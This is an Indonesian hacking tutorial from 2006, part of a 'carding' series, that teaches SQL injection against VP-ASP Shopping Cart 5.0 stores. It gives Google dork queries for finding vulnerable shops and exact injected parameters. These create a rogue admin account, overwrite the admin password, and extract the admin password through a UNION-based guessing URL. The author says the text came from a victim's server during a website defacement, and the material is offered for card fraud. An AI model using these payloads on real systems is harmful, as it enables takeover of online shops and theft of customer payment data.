|
[156]. Tutorial Carding (Bagian
X)
------------------------------------------------------
Author : SPYRO KiD
Contact : SPYRO_ZONE@yahoo.com
==> WWW.SPYROZONE.TK
CopyLEFT (c) 2006
www.spyrozone.tk All Rights Reserved
� 28/09/2006 04:20:55 WIB
------------------------------------------------------
--------------------------------------
Tutorial ini spyro dapatkan dari
suatu ftp seorang korban saat sedang mendeface webnya (lihat posting berjudul "Mengapa
aku mendeface profil FS dan website Fun2Holic" (19 september 2006) di halaman
Cerita Hari iNi.
--------------------------------------
'`%%`%%`%%,`%%'`% Materi ke-10 :
VP-ASP Shopping Cart 5.0 Cara I`%%`%%`%%,`%%'`% '
!NB : SQL Injection vulnerability pada script 'shopsearch.asp'
1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopsearch.asp
2. Buka url target dan utk membuat admin baru, postingkan data berikut satu per
satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
('<USERNAME>')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='<PASSWORD>' where
fldusername='<USERNAME>'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername='<USERNAME>'--&SubCategory=All&action.x=33&action.y=6
jangan lupa untuk mengganti <USERNAME> dan <PASSWORD> sesuai selera!:
3. Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='<PASSWORD>' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
4. Untuk login admin, ada di http://.../vpasp/shopadmin.asp
'`%%`%%`%%,`%%'`% Materi ke-10 :
VP-ASP Shopping Cart 5.0 Cara II`%%`%%`%%,`%%'`% '
!NB : SQL Injection vulnerability pada script 'shopdisplayproducts.asp'
1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopdisplayproducts.asp
1. Cari target dahulu Website VP-ASP di google.com, dengan keyword allinurl:/vpasp/shopdisplayproducts.asp
2. Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
http://.../vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--
3. Ganti�lah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
dst...
4. Naah.. kalau berhasil, kita akan mendapatkan informasi username dan password
admin!
5. Untuk login admin ke http://.../vpasp/shopadmin.asp
6. Demikanlah, Materi ke-10 Selesai.
/* ------------------------------|EOF|------------------------------ */
|